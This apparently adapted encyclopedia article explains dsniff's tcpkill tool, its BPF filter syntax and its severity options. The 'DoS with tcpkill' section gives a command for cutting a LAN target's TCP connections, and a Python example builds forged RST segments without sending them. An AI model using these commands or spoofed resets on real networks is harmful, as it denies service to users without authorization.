Tcpkill
Tcpkill can be used to kill connections to or from a particular host, network, port, or combination of all. It takes a standard Berkeley Packet Filter (BPF) filter expression, the same syntax tcpdump uses, and injects forged TCP RST segments into every connection whose packets match the filter. Because each reset is built from a segment tcpkill has just sniffed, the tool has to be somewhere it can see the traffic: on a hub, on a switch port mirror, or in the middle of an ARP-spoofed (ARP cache poisoned) path on a switched LAN. On its own it neither mirrors ports nor poisons ARP caches; the arpspoof program from the same dsniff package is usually used for the latter.


For example, to prevent any connections to the host www.google.com use this command:

/usr/sbin/tcpkill -9 host www.google.com

The computer that is attempting to go to that site will be blocked from that site only, but can surf any other site. The hostname is resolved once, when the filter is compiled, so the filter only covers the addresses it resolved to at that moment. Tcpkill prints a line for every reset it sends, so it is a good idea either to discard that output (>/dev/null 2>&1) or to redirect it into a file for later analysis (> file.tcpkill 2>&1). By default the output goes to the console.

More hosts can be specified by joining them with or. Note that and would not do what is wanted here: host www.google.com and host www.yahoo.com only matches packets travelling between those two hosts, so ordinary connections from the client to either of them would be left alone.

/usr/sbin/tcpkill -9 host www.google.com or host www.yahoo.com

To block well-known ports, e.g. napster (ports 8888 and 6699) or gnutella (port 6346), the command:

/usr/sbin/tcpkill -9 port 8888 or port 6699

or

/usr/sbin/tcpkill -9 port 6346

will do the trick. The same rule applies to ports: port 8888 and port 6699 would only match a packet that has one of those ports as its source and the other as its destination.
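The following is an added example (Python, not dsniff code and not part of the original page) that makes the and/or distinction in the filters above concrete. It evaluates the small subset of BPF syntax this page uses (host NAME, port N, and, or, not, parentheses) against constructed packets, so a filter can be checked before it is handed to a tool that resets every connection it matches. The HOSTS table is a constructed stand-in for DNS using documentation addresses, SAMPLE is constructed traffic from the page's client 192.168.100.38, and only TCP packets are modelled because tcpkill ignores everything else.

```python
"""What a tcpkill filter actually selects: `and` versus `or`.

Added example, not dsniff code. Evaluates `host NAME`, `port N`, `and`,
`or`, `not` and parentheses against constructed packets. Hostnames are
resolved through the constructed HOSTS table instead of DNS.
"""
import re
from collections import namedtuple

# Constructed name table standing in for DNS (documentation addresses, not real ones)
HOSTS = {"www.google.com": "192.0.2.1", "www.yahoo.com": "198.51.100.1"}
TOKEN = re.compile(r"\(|\)|[^\s()]+")

Pkt = namedtuple("Pkt", "src dst sport dport")


class Parser:
    """Recursive descent with BPF precedence: or < and < not < primary."""
    def __init__(self, expr):
        self.toks, self.pos = TOKEN.findall(expr), 0
    def peek(self):
        return self.toks[self.pos] if self.pos < len(self.toks) else None
    def take(self):
        self.pos += 1
        return self.toks[self.pos - 1]
    def p_or(self):
        node = self.p_and()
        while self.peek() == "or":
            self.take()
            node = ("or", node, self.p_and())
        return node
    def p_and(self):
        node = self.p_not()
        while self.peek() == "and":
            self.take()
            node = ("and", node, self.p_not())
        return node
    def p_not(self):
        if self.peek() == "not":
            self.take()
            return ("not", self.p_not())
        return self.p_primary()
    def p_primary(self):
        tok = self.take()
        if tok == "(":
            node = self.p_or()
            if self.take() != ")":
                raise ValueError("expected ')'")
            return node
        if tok == "host":  # name resolved once, as pcap does when it compiles the filter
            name = self.take()
            return ("host", HOSTS.get(name, name))
        if tok == "port":
            return ("port", int(self.take()))
        raise ValueError(f"unsupported token {tok!r}")


def matches(node, p):
    """`host` and `port` match either direction of the packet, exactly as in BPF."""
    kind = node[0]
    if kind == "host":
        return node[1] in (p.src, p.dst)
    if kind == "port":
        return node[1] in (p.sport, p.dport)
    if kind == "not":
        return not matches(node[1], p)
    if kind == "and":
        return matches(node[1], p) and matches(node[2], p)
    return matches(node[1], p) or matches(node[2], p)


def select(expr, pkts):
    """Packets (and so connections) a tcpkill run with this filter would reset."""
    parser = Parser(expr)
    tree = parser.p_or()
    if parser.peek() is not None:
        raise ValueError(f"trailing token {parser.peek()!r}")
    return [p for p in pkts if matches(tree, p)]


# Constructed traffic from the page's example client, 192.168.100.38
SAMPLE = [
    Pkt("192.168.100.38", "192.0.2.1", 40000, 80),     # client -> www.google.com
    Pkt("192.168.100.38", "198.51.100.1", 40001, 80),  # client -> www.yahoo.com
    Pkt("192.0.2.1", "198.51.100.1", 50000, 443),      # google -> yahoo, no client involved
    Pkt("192.168.100.38", "10.0.0.5", 40002, 22),      # client -> ssh
    Pkt("192.168.100.38", "10.0.0.9", 8888, 6699),     # both napster ports in one packet
    Pkt("192.168.100.38", "10.0.0.9", 40003, 6699),    # only one napster port
]
```

Run select("host www.google.com and host www.yahoo.com", SAMPLE) and only the google-to-yahoo packet comes back, so the client's own browsing would survive; the or form returns all three packets that touch either host. The port case behaves the same way, which is why a filter for a tool like this is worth dry-running before it is allowed to send resets.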

DoS with tcpkill

Tcpkill can be used to create a DoS attack within a LAN, or any WAN segment whose traffic it can observe, and this can be done by using a sniffer like dsniff or tcpdump to look at the packets that are being transmitted and to pick a target that you want to deny service. Assume the target has been identified as 192.168.100.38; a simple command like:

tcpkill -9 host 192.168.100.38

will reset every TCP connection between the target and the rest of the network as soon as a segment of it is seen. Nothing is actually blocked: the target still receives packets, but each TCP connection it opens is torn down by a forged reset, so from the user's point of view every TCP session fails. UDP and ICMP traffic is unaffected. Note that the options must come before the filter expression; tcpkill host -9 ... would be parsed as a filter and rejected.

Options

-i interface

The -i option specifies which interface you want the program to listen on. If it is omitted, tcpkill listens on the first interface libpcap reports, which on most single-interface Linux machines has traditionally been eth0.

-1...-9

The -1 to -9 options specify the degree of brute force you want the attack to use on the target, with -1 being the least and -9 the most. The number is how many resets tcpkill injects for each packet it sees; each reset carries a sequence number advanced by one more receive window than the previous one, so that at least one of them lands inside the receiver's window even if the connection has moved on since the packet was sniffed. Targets on very fast connections usually require more brute force in order to successfully perform a DoS attack on them, because more data is in flight between the sniffed segment and the reset. The default is -3. Both options can be left out, in which case the command is simply tcpkill followed by the filter expression.
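The reset-injection mechanism behind the DoS command above and the -1...-9 severity option, as an added example in Python (it is not dsniff's C source, and the sequence stepping ack + i*win is a simplified model of what the page describes, not a line-by-line copy). For one observed segment it builds the resets tcpkill would send: spoofed from the peer back to the sender, RST flag, ack 0 and window 0, with real IPv4 and TCP checksums. The packets are constructed (the page's client 192.168.100.38 talking to the documentation address 203.0.113.10), nothing is transmitted, and reset_accepted models whether a receiver would honour each reset under classic RFC 793 rules and under RFC 5961.

```python
"""Reset segments as tcpkill's -1..-9 severity setting would build them.

Added example, not dsniff code. For each observed TCP segment matching the
filter (SYN/FIN/RST segments are skipped) tcpkill answers the sender with
N resets (N = severity) that impersonate the peer and claim sequence numbers
ack, ack + win, ack + 2*win, ... (simplified stepping used here). Headers are
built as raw bytes with valid checksums; sending them would need a raw
socket and root, which this example deliberately does not do.
"""
import socket
import struct

TH_FIN, TH_SYN, TH_RST, TH_PSH, TH_ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (pads odd length)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_segment(src, dst, sport, dport, seq, ack, flags, win):
    """IPv4 header + 20-byte TCP header, no payload, both checksums filled in."""
    src_b, dst_b = socket.inet_aton(src), socket.inet_aton(dst)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, win, 0, 0)
    pseudo = src_b + dst_b + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, src_b, dst_b)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def parse_segment(pkt):
    """Fields tcpkill needs from an observed IPv4/TCP segment."""
    ihl = (pkt[0] & 0x0F) * 4
    sport, dport, seq, ack, _off, flags, win = struct.unpack("!HHIIBBH", pkt[ihl:ihl + 16])
    return {"src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
            "sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags, "win": win}


def checksums_ok(pkt):
    """Both checksums verify iff re-summing with the checksum field included yields 0."""
    ihl = (pkt[0] & 0x0F) * 4
    pseudo = pkt[12:16] + pkt[16:20] + struct.pack("!BBH", 0, 6, len(pkt) - ihl)
    return checksum(pkt[:ihl]) == 0 and checksum(pseudo + pkt[ihl:]) == 0


def tcpkill_resets(observed, severity=3):
    """Resets tcpkill would inject for one observed segment (severity = -1..-9)."""
    s = parse_segment(observed)
    if s["flags"] & (TH_SYN | TH_FIN | TH_RST):
        return []  # handshake and teardown segments are ignored
    out = []
    for i in range(severity):
        seq = (s["ack"] + i * s["win"]) & 0xFFFFFFFF
        # Spoofed as if from the peer, back to the sender: RST, ack 0, win 0
        out.append(build_segment(s["dst"], s["src"], s["dport"], s["sport"], seq, 0, TH_RST, 0))
    return out


def reset_accepted(seq, rcv_nxt, rcv_wnd, rfc5961=False):
    """Would the receiver honour a RST with this sequence number?

    Classic RFC 793: any RST inside [rcv_nxt, rcv_nxt + rcv_wnd) tears the
    connection down. RFC 5961 stacks (modern Linux) only honour seq == rcv_nxt
    and answer other in-window RSTs with a challenge ACK instead.
    """
    if rfc5961 or rcv_wnd == 0:
        return seq == rcv_nxt
    return (seq - rcv_nxt) & 0xFFFFFFFF < rcv_wnd


def which_land(resets, rcv_nxt, rcv_wnd, rfc5961=False):
    return [reset_accepted(parse_segment(r)["seq"], rcv_nxt, rcv_wnd, rfc5961) for r in resets]


if __name__ == "__main__":
    # Constructed: 192.168.100.38 mid-download from 203.0.113.10:80, window 65535
    obs = build_segment("192.168.100.38", "203.0.113.10", 40000, 80, 1000, 5000, TH_PSH | TH_ACK, 65535)
    for r in tcpkill_resets(obs, severity=3):
        f = parse_segment(r)
        print(f"{f['src']}:{f['sport']} > {f['dst']}:{f['dport']}: R {f['seq']}:{f['seq']}(0) win 0")
```

With severity 3 the three resets claim sequence numbers 5000, 70535 and 136070. If the receiver is still at rcv.nxt 5000 the first one lands; if the transfer has raced ahead to 60000 by the time the reset arrives, only the second one is in the window, which is the whole point of the -1...-9 knob. Against a stack that implements RFC 5961, however, an in-window reset that is not exactly at rcv.nxt is answered with a challenge ACK rather than a teardown, so tcpkill is far less reliable against modern Linux and similar systems than against the stacks of its era.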

----

This is a description of one of the various dsniff programs. This text belongs to the dsniff “README” written by the author Dug Song.

Name        Description
tcpkill     Kills specified in-progress TCP connections (useful for libnids-based applications which require a full TCP 3-whs for TCB creation). Can be effective for bandwidth control.


See also: filesnarf, macof, mailsnarf, msgsnarf, sshmitm, tcpnice, urlsnarf, webmitm, webspy (all described at http://www.ouah.org/dsniffintr.htm).
The source of this article is wikipedia, the free encyclopedia.  The text of this article is licensed under the GFDL.
 